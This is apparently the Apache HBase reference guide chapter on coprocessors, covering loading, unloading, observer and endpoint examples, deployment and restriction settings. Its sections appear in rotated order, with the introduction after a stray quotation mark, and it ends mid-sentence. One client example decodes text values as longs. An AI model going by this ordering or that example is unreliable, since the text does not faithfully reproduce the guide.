\n<<cp_example,Examples>> provides working examples of endpoint coprocessors.\n\n[[cp_loading]]\n== Loading Coprocessors\n\nTo make your coprocessor available to HBase, it must be _loaded_, either statically\n(through the HBase configuration) or dynamically (using HBase Shell or the Java API).\n\n=== Static Loading\n\nFollow these steps to statically load your coprocessor. Keep in mind that you must\nrestart HBase to unload a coprocessor that has been loaded statically.\n\n. Define the Coprocessor in _hbase-site.xml_, with a <property> element with a <name>\nand a <value> sub-element. The <name> should be one of the following:\n+\n- `hbase.coprocessor.region.classes` for RegionObservers and Endpoints.\n- `hbase.coprocessor.wal.classes` for WALObservers.\n- `hbase.coprocessor.master.classes` for MasterObservers.\n+\n<value> must contain the fully-qualified class name of your coprocessor's implementation\nclass.\n+\nFor example, to load a Coprocessor (implemented in the class SumEndPoint.java) you have to create\nthe following entry in the RegionServer's 'hbase-site.xml' file (generally located under the 'conf' directory):\n+\n[source,xml]\n----\n<property>\n <name>hbase.coprocessor.region.classes<\/name>\n <value>org.myname.hbase.coprocessor.endpoint.SumEndPoint<\/value>\n<\/property>\n----\n+\nIf multiple classes are specified for loading, the class names must be comma-separated.\nThe framework attempts to load all the configured classes using the default class loader.\nTherefore, the jar file must reside on the server-side HBase classpath.\n\n+\nCoprocessors which are loaded in this way will be active on all regions of all tables.\nThese are also called system Coprocessors.\nThe first listed Coprocessor will be assigned the priority `Coprocessor.Priority.SYSTEM`.\nEach subsequent coprocessor in the list will have its priority value incremented by one (which\nreduces its priority, because priorities have the natural sort order of Integers).\n\n+\nThese priority values can be manually overridden in hbase-site.xml. This can be useful if you\nwant to guarantee that a coprocessor will execute after another. For example, in the following\nconfiguration `SumEndPoint` would be guaranteed to go last, except in the case of a tie with\nanother coprocessor:\n+\n[source,xml]\n----\n<property>\n <name>hbase.coprocessor.region.classes<\/name>\n <value>org.myname.hbase.coprocessor.endpoint.SumEndPoint|2147483647<\/value>\n<\/property>\n----\n\n+\nWhen calling out to registered observers, the framework executes their callback methods in the\nsorted order of their priority. +\nTies are broken arbitrarily.\n\n. Put your code on HBase's classpath. One easy way to do this is to drop the jar\n (containing your code and all the dependencies) into the `lib\/` directory in the\n HBase installation.\n\n. Restart HBase.\n\n\n=== Static Unloading\n\n. Delete the coprocessor's <property> element, including sub-elements, from `hbase-site.xml`.\n. Restart HBase.\n. Optionally, remove the coprocessor's JAR file from the classpath or HBase's `lib\/`\n directory.\n\n\n=== Dynamic Loading\n\nYou can also load a coprocessor dynamically, without restarting HBase. 
This may seem\npreferable to static loading, but dynamically loaded coprocessors are loaded on a\nper-table basis, and are only available to the table for which they were loaded. For\nthis reason, dynamically loaded coprocessors are sometimes called *Table Coprocessors*.\n\nIn addition, dynamically loading a coprocessor acts as a schema change on the table,\nand the table must be taken offline to load the coprocessor.\n\nThere are three ways to dynamically load a Coprocessor.\n\n[NOTE]\n.Assumptions\n====\nThe instructions below make the following assumptions:\n\n* A JAR called `coprocessor.jar` contains the Coprocessor implementation along with all of its\ndependencies.\n* The JAR is available in HDFS in some location like\n`hdfs:\/\/<namenode>:<port>\/user\/<hadoop-user>\/coprocessor.jar`.\n====\n\n[[load_coprocessor_in_shell]]\n==== Using HBase Shell\n\n. Load the Coprocessor, using a command like the following:\n+\n[source]\n----\nhbase alter 'users', METHOD => 'table_att', 'Coprocessor'=>'hdfs:\/\/<namenode>:<port>\/\nuser\/<hadoop-user>\/coprocessor.jar| org.myname.hbase.Coprocessor.RegionObserverExample|1073741823|\narg1=1,arg2=2'\n----\n+\nThe Coprocessor framework will try to read the class information from the coprocessor table\nattribute value.\nThe value contains four pieces of information, separated by the pipe (`|`) character:\n+\n* File path: The jar file containing the Coprocessor implementation must be in a location where\nall region servers can read it. +\nYou could copy the file onto the local disk on each region server, but it is recommended to store\nit in HDFS. +\nhttps:\/\/issues.apache.org\/jira\/browse\/HBASE-14548[HBASE-14548] allows a directory containing the jars\nor some wildcards to be specified, such as: hdfs:\/\/<namenode>:<port>\/user\/<hadoop-user>\/ or\nhdfs:\/\/<namenode>:<port>\/user\/<hadoop-user>\/*.jar. Please note that if a directory is specified,\nall jar files (.jar) in the directory are added. It does not search for files in sub-directories.\nDo not use a wildcard if you would like to specify a directory. This enhancement applies to the\nusage via the Java API as well.\n* Class name: The full class name of the Coprocessor.\n* Priority: An integer. The framework will determine the execution sequence of all configured\nobservers registered at the same hook using priorities. This field can be left blank. In that\ncase the framework will assign a default priority value.\n* Arguments (Optional): This field is passed to the Coprocessor implementation.\n\n. 
Verify that the coprocessor loaded:\n+\n----\nhbase(main):04:0> describe 'users'\n----\n+\nThe coprocessor should be listed in the `TABLE_ATTRIBUTES`.\n\n==== Using the Java API (all HBase versions)\n\nThe following Java code shows how to use the `setValue()` method of `HTableDescriptor`\nto load a coprocessor on the `users` table.\n\n[source,java]\n----\nTableName tableName = TableName.valueOf(\"users\");\nString path = \"hdfs:\/\/<namenode>:<port>\/user\/<hadoop-user>\/coprocessor.jar\";\nConfiguration conf = HBaseConfiguration.create();\nConnection connection = ConnectionFactory.createConnection(conf);\nAdmin admin = connection.getAdmin();\nHTableDescriptor hTableDescriptor = new HTableDescriptor(tableName);\nHColumnDescriptor columnFamily1 = new HColumnDescriptor(\"personalDet\");\ncolumnFamily1.setMaxVersions(3);\nhTableDescriptor.addFamily(columnFamily1);\nHColumnDescriptor columnFamily2 = new HColumnDescriptor(\"salaryDet\");\ncolumnFamily2.setMaxVersions(3);\nhTableDescriptor.addFamily(columnFamily2);\nhTableDescriptor.setValue(\"COPROCESSOR$1\", path + \"|\"\n    + RegionObserverExample.class.getCanonicalName() + \"|\"\n    + Coprocessor.PRIORITY_USER);\nadmin.modifyTable(tableName, hTableDescriptor);\n----\n\n==== Using the Java API (HBase 0.96+ only)\n\nIn HBase 0.96 and newer, the `addCoprocessor()` method of `HTableDescriptor` provides\nan easier way to load a coprocessor dynamically.\n\n[source,java]\n----\nTableName tableName = TableName.valueOf(\"users\");\nPath path = new Path(\"hdfs:\/\/<namenode>:<port>\/user\/<hadoop-user>\/coprocessor.jar\");\nConfiguration conf = HBaseConfiguration.create();\nConnection connection = ConnectionFactory.createConnection(conf);\nAdmin admin = connection.getAdmin();\nHTableDescriptor hTableDescriptor = new HTableDescriptor(tableName);\nHColumnDescriptor columnFamily1 = new HColumnDescriptor(\"personalDet\");\ncolumnFamily1.setMaxVersions(3);\nhTableDescriptor.addFamily(columnFamily1);\nHColumnDescriptor columnFamily2 = new HColumnDescriptor(\"salaryDet\");\ncolumnFamily2.setMaxVersions(3);\nhTableDescriptor.addFamily(columnFamily2);\nhTableDescriptor.addCoprocessor(RegionObserverExample.class.getCanonicalName(), path,\n    Coprocessor.PRIORITY_USER, null);\nadmin.modifyTable(tableName, hTableDescriptor);\n----\n\nWARNING: There is no guarantee that the framework will load a given Coprocessor successfully.\nFor example, the shell command neither guarantees a jar file exists at a particular location nor\nverifies whether the given class is actually contained in the jar file.\n
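\nOn HBase 2.x and newer, `HTableDescriptor` is deprecated. A sketch of the same load using the builder-based API (`TableDescriptorBuilder` and `CoprocessorDescriptorBuilder` from `org.apache.hadoop.hbase.client`; treat the exact calls as a sketch to verify against your HBase version) might look like this:\n\n[source,java]\n----\nTableName tableName = TableName.valueOf(\"users\");\nString path = \"hdfs:\/\/<namenode>:<port>\/user\/<hadoop-user>\/coprocessor.jar\";\ntry (Connection connection = ConnectionFactory.createConnection(HBaseConfiguration.create());\n     Admin admin = connection.getAdmin()) {\n    \/\/ Start from the table's current descriptor and add the coprocessor to it.\n    TableDescriptor updated = TableDescriptorBuilder.newBuilder(admin.getDescriptor(tableName))\n        .setCoprocessor(CoprocessorDescriptorBuilder\n            .newBuilder(RegionObserverExample.class.getCanonicalName())\n            .setJarPath(path)\n            .setPriority(Coprocessor.PRIORITY_USER)\n            .build())\n        .build();\n    admin.modifyTable(updated);\n}\n----\n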
\n\n=== Dynamic Unloading\n\n==== Using HBase Shell\n\n. Alter the table to remove the coprocessor with `table_att_unset`:\n+\n[source]\n----\nhbase> alter 'users', METHOD => 'table_att_unset', NAME => 'coprocessor$1'\n----\n\n. Alternatively, remove the coprocessor by specifying its class name explicitly with\n`table_remove_coprocessor`, introduced in\nlink:https:\/\/issues.apache.org\/jira\/browse\/HBASE-26524[HBASE-26524]:\n+\n[source]\n----\nhbase> alter 'users', METHOD => 'table_remove_coprocessor', CLASSNAME =>\n 'org.myname.hbase.Coprocessor.RegionObserverExample'\n----\n\n\n==== Using the Java API\n\nReload the table definition without setting the value of the coprocessor either by\nusing `setValue()` or `addCoprocessor()` methods. This will remove any coprocessor\nattached to the table.\n\n[source,java]\n----\nTableName tableName = TableName.valueOf(\"users\");\nString path = \"hdfs:\/\/<namenode>:<port>\/user\/<hadoop-user>\/coprocessor.jar\";\nConfiguration conf = HBaseConfiguration.create();\nConnection connection = ConnectionFactory.createConnection(conf);\nAdmin admin = connection.getAdmin();\nHTableDescriptor hTableDescriptor = new HTableDescriptor(tableName);\nHColumnDescriptor columnFamily1 = new HColumnDescriptor(\"personalDet\");\ncolumnFamily1.setMaxVersions(3);\nhTableDescriptor.addFamily(columnFamily1);\nHColumnDescriptor columnFamily2 = new HColumnDescriptor(\"salaryDet\");\ncolumnFamily2.setMaxVersions(3);\nhTableDescriptor.addFamily(columnFamily2);\nadmin.modifyTable(tableName, hTableDescriptor);\n----\n\nIn HBase 0.96 and newer, you can instead use the `removeCoprocessor()` method of the\n`HTableDescriptor` class.\n\n\n[[cp_example]]\n== Examples\nHBase ships with examples of Observer Coprocessors.\n\nA more detailed example is given below.\n\nThese examples assume a table called `users`, which has two column families `personalDet`\nand `salaryDet`, containing personal and salary details. Below is the graphical representation\nof the `users` table.\n\n.Users Table\n[width=\"100%\",cols=\"7\",options=\"header,footer\"]\n|====================\n| 3+|personalDet 3+|salaryDet\n|*rowkey* |*name* |*lastname* |*dob* |*gross* |*net* |*allowances*\n|admin |Admin |Admin | 3+|\n|cdickens |Charles |Dickens |02\/07\/1812 |10000 |8000 |2000\n|jverne |Jules |Verne |02\/08\/1828 |12000 |9000 |3000\n|====================\n\n\n=== Observer Example\n\nThe following Observer coprocessor prevents the details of the user `admin` from being\nreturned in a `Get` or `Scan` of the `users` table.\n\n. Write a class that implements the\nlink:https:\/\/hbase.apache.org\/devapidocs\/org\/apache\/hadoop\/hbase\/coprocessor\/RegionCoprocessor.html[RegionCoprocessor] and\nlink:https:\/\/hbase.apache.org\/devapidocs\/org\/apache\/hadoop\/hbase\/coprocessor\/RegionObserver.html[RegionObserver]\ninterfaces.\n\n. Override the `preGetOp()` method (the `preGet()` method is deprecated) to check\nwhether the client has queried for the rowkey with value `admin`. If so, return an\nempty result. Otherwise, process the request as normal.\n\n. Put your code and dependencies in a JAR file.\n\n. Place the JAR in HDFS where HBase can locate it.\n\n. Load the Coprocessor.\n\n. Write a simple program to test it.\n\nThe following code implements the above steps:\n\n[source,java]\n----\npublic class RegionObserverExample implements RegionCoprocessor, RegionObserver {\n\n private static final byte[] ADMIN = Bytes.toBytes(\"admin\");\n private static final byte[] COLUMN_FAMILY = Bytes.toBytes(\"details\");\n private static final byte[] COLUMN = Bytes.toBytes(\"Admin_det\");\n private static final byte[] VALUE = Bytes.toBytes(\"You can't see Admin details\");\n\n @Override\n public Optional<RegionObserver> getRegionObserver() {\n return Optional.of(this);\n }\n\n @Override\n public void preGetOp(final ObserverContext<RegionCoprocessorEnvironment> e, final Get get, final List<Cell> results)\n throws IOException {\n\n if (Bytes.equals(get.getRow(),ADMIN)) {\n Cell c = CellUtil.createCell(get.getRow(),COLUMN_FAMILY, COLUMN,\n System.currentTimeMillis(), (byte)4, VALUE);\n results.add(c);\n e.bypass();\n }\n }\n}\n----\n\nOverriding the `preGetOp()` will only work for `Get` operations. 
You also need to override\nthe `preScannerOpen()` method to filter the `admin` row from scan results.\n\n[source,java]\n----\n@Override\npublic RegionScanner preScannerOpen(final ObserverContext<RegionCoprocessorEnvironment> e, final Scan scan,\nfinal RegionScanner s) throws IOException {\n\n Filter filter = new RowFilter(CompareOp.NOT_EQUAL, new BinaryComparator(ADMIN));\n scan.setFilter(filter);\n return s;\n}\n----\n\nThis method works, but there is a _side effect_. If the client has used a filter in\nits scan, that filter will be replaced by this filter. Instead, you can explicitly\nremove any `admin` results from the scan:\n\n[source,java]\n----\n@Override\npublic boolean postScannerNext(final ObserverContext<RegionCoprocessorEnvironment> e, final InternalScanner s,\nfinal List<Result> results, final int limit, final boolean hasMore) throws IOException {\n Result result = null;\n Iterator<Result> iterator = results.iterator();\n while (iterator.hasNext()) {\n result = iterator.next();\n if (Bytes.equals(result.getRow(), ADMIN)) {\n iterator.remove();\n break;\n }\n }\n return hasMore;\n}\n----\n\n=== Endpoint Example\n\nStill using the `users` table, this example implements an endpoint coprocessor that calculates\nthe sum of all employee salaries.\n\n. Create a '.proto' file defining your service.\n+\n[source]\n----\noption java_package = \"org.myname.hbase.coprocessor.autogenerated\";\noption java_outer_classname = \"Sum\";\noption java_generic_services = true;\noption java_generate_equals_and_hash = true;\noption optimize_for = SPEED;\nmessage SumRequest {\n required string family = 1;\n required string column = 2;\n}\n\nmessage SumResponse {\n required int64 sum = 1 [default = 0];\n}\n\nservice SumService {\n rpc getSum(SumRequest)\n returns (SumResponse);\n}\n----\n\n. Execute the `protoc` command to generate the Java code from the above '.proto' file.\n+\n[source]\n----\n$ mkdir src\n$ protoc --java_out=src .\/sum.proto\n----\n+\nThis will generate a class called `Sum.java`.\n\n. Write a class that extends the generated service class, implement the `Coprocessor`\nand `CoprocessorService` interfaces, and override the service method.\n+\nWARNING: If you load a coprocessor from `hbase-site.xml` and then load the same coprocessor\nagain using HBase Shell, it will be loaded a second time. 
The same class will\nexist twice, and the second instance will have a higher ID (and thus a lower priority).\nThe effect is that the duplicate coprocessor is effectively ignored.\n+\n[source, java]\n----\npublic class SumEndPoint extends Sum.SumService implements Coprocessor, CoprocessorService {\n\n private RegionCoprocessorEnvironment env;\n\n @Override\n public Service getService() {\n return this;\n }\n\n @Override\n public void start(CoprocessorEnvironment env) throws IOException {\n if (env instanceof RegionCoprocessorEnvironment) {\n this.env = (RegionCoprocessorEnvironment)env;\n } else {\n throw new CoprocessorException(\"Must be loaded on a table region!\");\n }\n }\n\n @Override\n public void stop(CoprocessorEnvironment env) throws IOException {\n \/\/ do nothing\n }\n\n @Override\n public void getSum(RpcController controller, Sum.SumRequest request, RpcCallback<Sum.SumResponse> done) {\n Scan scan = new Scan();\n scan.addFamily(Bytes.toBytes(request.getFamily()));\n scan.addColumn(Bytes.toBytes(request.getFamily()), Bytes.toBytes(request.getColumn()));\n\n Sum.SumResponse response = null;\n InternalScanner scanner = null;\n\n try {\n scanner = env.getRegion().getScanner(scan);\n List<Cell> results = new ArrayList<>();\n boolean hasMore = false;\n long sum = 0L;\n\n do {\n hasMore = scanner.next(results);\n for (Cell cell : results) {\n sum = sum + Bytes.toLong(CellUtil.cloneValue(cell));\n }\n results.clear();\n } while (hasMore);\n\n response = Sum.SumResponse.newBuilder().setSum(sum).build();\n } catch (IOException ioe) {\n ResponseConverter.setControllerException(controller, ioe);\n } finally {\n if (scanner != null) {\n try {\n scanner.close();\n } catch (IOException ignored) {}\n }\n }\n\n done.run(response);\n }\n}\n----\n+\nThe following client code invokes the endpoint through the (now-deprecated) synchronous\n`Table.coprocessorService()` API:\n+\n[source, java]\n----\nConfiguration conf = HBaseConfiguration.create();\nConnection connection = ConnectionFactory.createConnection(conf);\nTableName tableName = TableName.valueOf(\"users\");\nTable table = connection.getTable(tableName);\n\nfinal Sum.SumRequest request = Sum.SumRequest.newBuilder().setFamily(\"salaryDet\").setColumn(\"gross\").build();\ntry {\n Map<byte[], Long> results = table.coprocessorService(\n Sum.SumService.class,\n null, \/* start key *\/\n null, \/* end key *\/\n new Batch.Call<Sum.SumService, Long>() {\n @Override\n public Long call(Sum.SumService aggregate) throws IOException {\n BlockingRpcCallback<Sum.SumResponse> rpcCallback = new BlockingRpcCallback<>();\n aggregate.getSum(null, request, rpcCallback);\n Sum.SumResponse response = rpcCallback.get();\n\n return response.hasSum() ? response.getSum() : 0L;\n }\n }\n );\n\n for (Long sum : results.values()) {\n System.out.println(\"Sum = \" + sum);\n }\n} catch (ServiceException e) {\n e.printStackTrace();\n} catch (Throwable e) {\n e.printStackTrace();\n}\n----\n\n. Load the Coprocessor.\n\n. Write client code to call the Coprocessor. An asynchronous alternative is sketched below.\n
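\nAs noted in <<cpeps>>, the synchronous `Table.coprocessorService()` API is deprecated in favor of `AsyncTable`. The following sketch shows the equivalent single-region call on HBase 2.x (it reuses the generated `Sum` classes from above; the row key chosen to route the request, and the elided error handling, are illustrative):\n\n[source,java]\n----\ntry (AsyncConnection conn =\n        ConnectionFactory.createAsyncConnection(HBaseConfiguration.create()).get()) {\n    AsyncTable<?> table = conn.getTable(TableName.valueOf(\"users\"));\n    Sum.SumRequest request = Sum.SumRequest.newBuilder()\n        .setFamily(\"salaryDet\").setColumn(\"gross\").build();\n    \/\/ Routed to the single region containing the given row; AsyncTable also has a\n    \/\/ range-based coprocessorService overload for calls spanning multiple regions.\n    Sum.SumResponse response = table\n        .<Sum.SumService, Sum.SumResponse> coprocessorService(\n            Sum.SumService::newStub,\n            (stub, controller, callback) -> stub.getSum(controller, request, callback),\n            Bytes.toBytes(\"cdickens\"))\n        .get();\n    System.out.println(\"Sum = \" + response.getSum());\n}\n----\n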
\n\n== Guidelines For Deploying A Coprocessor\n\nBundling Coprocessors::\n You can bundle all classes for a coprocessor into a\n single JAR on the RegionServer's classpath, for easy deployment. Otherwise,\n place all dependencies on the RegionServer's classpath so that they can be\n loaded during RegionServer start-up. The classpath for a RegionServer is set\n in the RegionServer's `hbase-env.sh` file.\nAutomating Deployment::\n You can use a tool such as Puppet, Chef, or\n Ansible to ship the JAR for the coprocessor to the required location on your\n RegionServers' filesystems and restart each RegionServer, to automate\n coprocessor deployment. Details of such setups are outside the scope of this\n document.\nUpdating a Coprocessor::\n Deploying a new version of a given coprocessor is not as simple as disabling it,\n replacing the JAR, and re-enabling the coprocessor. This is because you cannot\n reload a class in a JVM unless you delete all the current references to it.\n Since the current JVM has a reference to the existing coprocessor, you must restart\n the JVM, by restarting the RegionServer, in order to replace it. This behavior\n is not expected to change.\nCoprocessor Logging::\n The Coprocessor framework does not provide an API for logging beyond standard Java\n logging.\nCoprocessor Configuration::\n If you do not want to load coprocessors from the HBase Shell, you can add their configuration\n properties to `hbase-site.xml`. In <<load_coprocessor_in_shell>>, two arguments are\n set: `arg1=1,arg2=2`. These could have been added to `hbase-site.xml` as follows:\n[source,xml]\n----\n<property>\n <name>arg1<\/name>\n <value>1<\/value>\n<\/property>\n<property>\n <name>arg2<\/name>\n <value>2<\/value>\n<\/property>\n----\nThe `users` table can then be exercised with client code like the following (how the\ncoprocessor itself reads these properties is sketched after this listing):\n[source,java]\n----\nConfiguration conf = HBaseConfiguration.create();\nConnection connection = ConnectionFactory.createConnection(conf);\nTableName tableName = TableName.valueOf(\"users\");\nTable table = connection.getTable(tableName);\n\nGet get = new Get(Bytes.toBytes(\"admin\"));\nResult result = table.get(get);\nfor (Cell c : result.rawCells()) {\n System.out.println(Bytes.toString(CellUtil.cloneRow(c))\n + \"==> \" + Bytes.toString(CellUtil.cloneFamily(c))\n + \"{\" + Bytes.toString(CellUtil.cloneQualifier(c))\n + \":\" + Bytes.toLong(CellUtil.cloneValue(c)) + \"}\");\n}\nScan scan = new Scan();\nResultScanner scanner = table.getScanner(scan);\nfor (Result res : scanner) {\n for (Cell c : res.rawCells()) {\n System.out.println(Bytes.toString(CellUtil.cloneRow(c))\n + \" ==> \" + Bytes.toString(CellUtil.cloneFamily(c))\n + \" {\" + Bytes.toString(CellUtil.cloneQualifier(c))\n + \":\" + Bytes.toLong(CellUtil.cloneValue(c))\n + \"}\");\n }\n}\n----\n
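\nInside the coprocessor itself, those properties can be read from the environment's configuration, typically in `start()`. A minimal sketch (the key names match the example above; the empty-string defaults are illustrative):\n\n[source,java]\n----\n@Override\npublic void start(CoprocessorEnvironment env) throws IOException {\n    Configuration conf = env.getConfiguration();\n    \/\/ Reads \"1\" and \"2\" when hbase-site.xml is configured as shown above.\n    String arg1 = conf.get(\"arg1\", \"\");\n    String arg2 = conf.get(\"arg2\", \"\");\n}\n----\n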
\n== Restricting Coprocessor Usage\n\nRestricting arbitrary user coprocessors can be a big concern in multitenant environments. HBase provides a continuum of options for ensuring only expected coprocessors are running:\n\n* `hbase.coprocessor.enabled`: Enables or disables all coprocessors. This will limit the functionality of HBase, as disabling all coprocessors will disable some security providers. An example coprocessor so affected is `org.apache.hadoop.hbase.security.access.AccessController`.\n* `hbase.coprocessor.user.enabled`: Enables or disables loading coprocessors on tables (i.e. user coprocessors).\n* One can statically load coprocessors, and optionally tune their priorities, via the following tunables in `hbase-site.xml`:\n** `hbase.coprocessor.regionserver.classes`: A comma-separated list of coprocessors that are loaded by region servers\n** `hbase.coprocessor.region.classes`: A comma-separated list of RegionObserver and Endpoint coprocessors\n** `hbase.coprocessor.user.region.classes`: A comma-separated list of coprocessors that are loaded by all regions\n** `hbase.coprocessor.master.classes`: A comma-separated list of coprocessors that are loaded by the master (MasterObserver coprocessors)\n** `hbase.coprocessor.wal.classes`: A comma-separated list of WALObserver coprocessors to load\n* `hbase.coprocessor.abortonerror`: Whether to abort the daemon which has loaded the coprocessor if the coprocessor throws an error other than `IOError`. If this is set to `false` and an access controller coprocessor has a fatal error, that coprocessor will be circumvented, so in secure installations this is advised to be `true`. However, one may override this on a per-table basis for user coprocessors, to ensure they do not abort their running region server and are instead unloaded on error.\n* `hbase.coprocessor.region.whitelist.paths`: A comma-separated list, consulted by `org.apache.hadoop.hbase.security.access.CoprocessorWhitelistMasterObserver` when it is loaded, of paths from which coprocessors may be loaded. The following options are available for white-listing paths:\n** Coprocessors on the classpath are implicitly white-listed\n** `*` to wildcard all coprocessor paths\n** An entire filesystem (e.g. `hdfs:\/\/my-cluster\/`)\n** A wildcard path to be evaluated by link:https:\/\/commons.apache.org\/proper\/commons-io\/javadocs\/api-release\/org\/apache\/commons\/io\/FilenameUtils.html[FilenameUtils.wildcardMatch]\n** Note: Path can specify scheme or not (e.g. `file:\/\/\/usr\/hbase\/lib\/coprocessors` or for all filesystems `\/usr\/hbase\/lib\/coprocessors`)\n\nFor example, a single white-list entry of `hdfs:\/\/my-cluster\/trusted-coprocessors\/*.jar` (the path is illustrative) would restrict dynamic loading to jars in that one directory.\n"
For more information see\nlink:https:\/\/issues.apache.org\/jira\/browse\/HBASE-4047[HBASE-4047].\n\nThe information in this chapter is primarily sourced and heavily reused from the following\nresources:\n\n. Mingjie Lai's blog post\nlink:https:\/\/blogs.apache.org\/hbase\/entry\/coprocessor_introduction[Coprocessor Introduction].\n. Gaurav Bhardwaj's blog post\nlink:http:\/\/www.3pillarglobal.com\/insights\/hbase-coprocessors[The How To Of HBase Coprocessors].\n\n[WARNING]\n.Use Coprocessors At Your Own Risk\n====\nCoprocessors are an advanced feature of HBase and are intended to be used by system\ndevelopers only. Because coprocessor code runs directly on the RegionServer and has\ndirect access to your data, they introduce the risk of data corruption, man-in-the-middle\nattacks, or other malicious data access. Currently, there is no mechanism to prevent\ndata corruption by coprocessors, though work is underway on\nlink:https:\/\/issues.apache.org\/jira\/browse\/HBASE-4047[HBASE-4047].\n+\nIn addition, there is no resource isolation, so a well-intentioned but misbehaving\ncoprocessor can severely degrade cluster performance and stability.\n====\n\n== Coprocessor Overview\n\nIn HBase, you fetch data using a `Get` or `Scan`, whereas in an RDBMS you use a SQL\nquery. In order to fetch only the relevant data, you filter it using a HBase\nlink:https:\/\/hbase.apache.org\/apidocs\/org\/apache\/hadoop\/hbase\/filter\/Filter.html[Filter]\n, whereas in an RDBMS you use a `WHERE` predicate.\n\nAfter fetching the data, you perform computations on it. This paradigm works well\nfor \"small data\" with a few thousand rows and several columns. However, when you scale\nto billions of rows and millions of columns, moving large amounts of data across your\nnetwork will create bottlenecks at the network layer, and the client needs to be powerful\nenough and have enough memory to handle the large amounts of data and the computations.\nIn addition, the client code can grow large and complex.\n\nIn this scenario, coprocessors might make sense. You can put the business computation\ncode into a coprocessor which runs on the RegionServer, in the same location as the\ndata, and returns the result to the client.\n\nThis is only one scenario where using coprocessors can provide benefit. Following\nare some analogies which may help to explain some of the benefits of coprocessors.\n\n[[cp_analogies]]\n=== Coprocessor Analogies\n\nTriggers and Stored Procedure::\n An Observer coprocessor is similar to a trigger in a RDBMS in that it executes\n your code either before or after a specific event (such as a `Get` or `Put`)\n occurs. An endpoint coprocessor is similar to a stored procedure in a RDBMS\n because it allows you to perform custom computations on the data on the\n RegionServer itself, rather than on the client.\n\nMapReduce::\n MapReduce operates on the principle of moving the computation to the location of\n the data. Coprocessors operate on the same principal.\n\nAOP::\n If you are familiar with Aspect Oriented Programming (AOP), you can think of a coprocessor\n as applying advice by intercepting a request and then running some custom code,\n before passing the request on to its final destination (or even changing the destination).\n\n\n=== Coprocessor Implementation Overview\n\n. 
Your class should implement one of the Coprocessor interfaces -\nlink:https:\/\/hbase.apache.org\/devapidocs\/org\/apache\/hadoop\/hbase\/Coprocessor.html[Coprocessor],\nlink:https:\/\/hbase.apache.org\/devapidocs\/org\/apache\/hadoop\/hbase\/coprocessor\/RegionObserver.html[RegionObserver],\nlink:https:\/\/hbase.apache.org\/devapidocs\/org\/apache\/hadoop\/hbase\/coprocessor\/CoprocessorService.html[CoprocessorService] - to name a few.\n\n. Load the coprocessor, either statically (from the configuration) or dynamically,\nusing HBase Shell. For more details see <<cp_loading,Loading Coprocessors>>.\n\n. Call the coprocessor from your client-side code. HBase handles the coprocessor\ntransparently.\n\nThe framework API is provided in the\nlink:https:\/\/hbase.apache.org\/apidocs\/org\/apache\/hadoop\/hbase\/coprocessor\/package-summary.html[coprocessor]\npackage.\n\n== Types of Coprocessors\n\n=== Observer Coprocessors\n\nObserver coprocessors are triggered either before or after a specific event occurs.\nObservers that happen before an event use methods that start with a `pre` prefix,\nsuch as link:https:\/\/hbase.apache.org\/devapidocs\/org\/apache\/hadoop\/hbase\/coprocessor\/RegionObserver.html#prePut-org.apache.hadoop.hbase.coprocessor.ObserverContext-org.apache.hadoop.hbase.client.Put-org.apache.hadoop.hbase.wal.WALEdit-org.apache.hadoop.hbase.client.Durability-[`prePut`]. Observers that happen just after an event override methods that start\nwith a `post` prefix, such as link:https:\/\/hbase.apache.org\/devapidocs\/org\/apache\/hadoop\/hbase\/coprocessor\/RegionObserver.html#postPut-org.apache.hadoop.hbase.coprocessor.ObserverContext-org.apache.hadoop.hbase.client.Put-org.apache.hadoop.hbase.wal.WALEdit-org.apache.hadoop.hbase.client.Durability-[`postPut`].\n\n\n==== Use Cases for Observer Coprocessors\nSecurity::\n Before performing a `Get` or `Put` operation, you can check for permission using\n `preGet` or `prePut` methods.\n\nReferential Integrity::\n HBase does not directly support the RDBMS concept of refential integrity, also known\n as foreign keys. You can use a coprocessor to enforce such integrity. For instance,\n if you have a business rule that every insert to the `users` table must be followed\n by a corresponding entry in the `user_daily_attendance` table, you could implement\n a coprocessor to use the `prePut` method on `user` to insert a record into `user_daily_attendance`.\n\nSecondary Indexes::\n You can use a coprocessor to maintain secondary indexes. For more information, see\n link:https:\/\/cwiki.apache.org\/confluence\/display\/HADOOP2\/Hbase+SecondaryIndexing[SecondaryIndexing].\n\n\n==== Types of Observer Coprocessor\n\nRegionObserver::\n A RegionObserver coprocessor allows you to observe events on a region, such as `Get`\n and `Put` operations. See\n link:https:\/\/hbase.apache.org\/devapidocs\/org\/apache\/hadoop\/hbase\/coprocessor\/RegionObserver.html[RegionObserver].\n\nRegionServerObserver::\n A RegionServerObserver allows you to observe events related to the RegionServer's\n operation, such as starting, stopping, or performing merges, commits, or rollbacks.\n See\n link:https:\/\/hbase.apache.org\/devapidocs\/org\/apache\/hadoop\/hbase\/coprocessor\/RegionServerObserver.html[RegionServerObserver].\n\nMasterObserver::\n A MasterObserver allows you to observe events related to the HBase Master, such\n as table creation, deletion, or schema modification. 
See\n link:https:\/\/hbase.apache.org\/devapidocs\/org\/apache\/hadoop\/hbase\/coprocessor\/MasterObserver.html[MasterObserver].\n\nWalObserver::\n A WalObserver allows you to observe events related to writes to the Write-Ahead\n Log (WAL). See\n link:https:\/\/hbase.apache.org\/devapidocs\/org\/apache\/hadoop\/hbase\/coprocessor\/WALObserver.html[WALObserver].\n\n<<cp_example,Examples>> provides working examples of observer coprocessors.\n\n\n\n[[cpeps]]\n=== Endpoint Coprocessor\n\nEndpoint processors allow you to perform computation at the location of the data.\nSee <<cp_analogies, Coprocessor Analogy>>. An example is the need to calculate a running\naverage or summation for an entire table which spans hundreds of regions.\n\nIn contrast to observer coprocessors, where your code is run transparently, endpoint\ncoprocessors must be explicitly invoked using the\nlink:https:\/\/hbase.apache.org\/devapidocs\/org\/apache\/hadoop\/hbase\/client\/AsyncTable.html#coprocessorService-java.util.function.Function-org.apache.hadoop.hbase.client.ServiceCaller-byte:A-[CoprocessorService()]\nmethod available in\nlink:https:\/\/hbase.apache.org\/devapidocs\/org\/apache\/hadoop\/hbase\/client\/AsyncTable.html[AsyncTable].\n\n[WARNING]\n.On using coprocessorService method with sync client\n====\nThe coprocessorService method in link:https:\/\/hbase.apache.org\/devapidocs\/org\/apache\/hadoop\/hbase\/client\/Table.html[Table]\nhas been deprecated.\n\nIn link:https:\/\/issues.apache.org\/jira\/browse\/HBASE-21512[HBASE-21512]\nwe reimplement the sync client based on the async client. The coprocessorService\nmethod defined in `Table` interface directly references a method from protobuf's\n`BlockingInterface`, which means we need to use a separate thread pool to execute\nthe method so we avoid blocking the async client(We want to avoid blocking calls in\nour async implementation).\n\nSince coprocessor is an advanced feature, we believe it is OK for 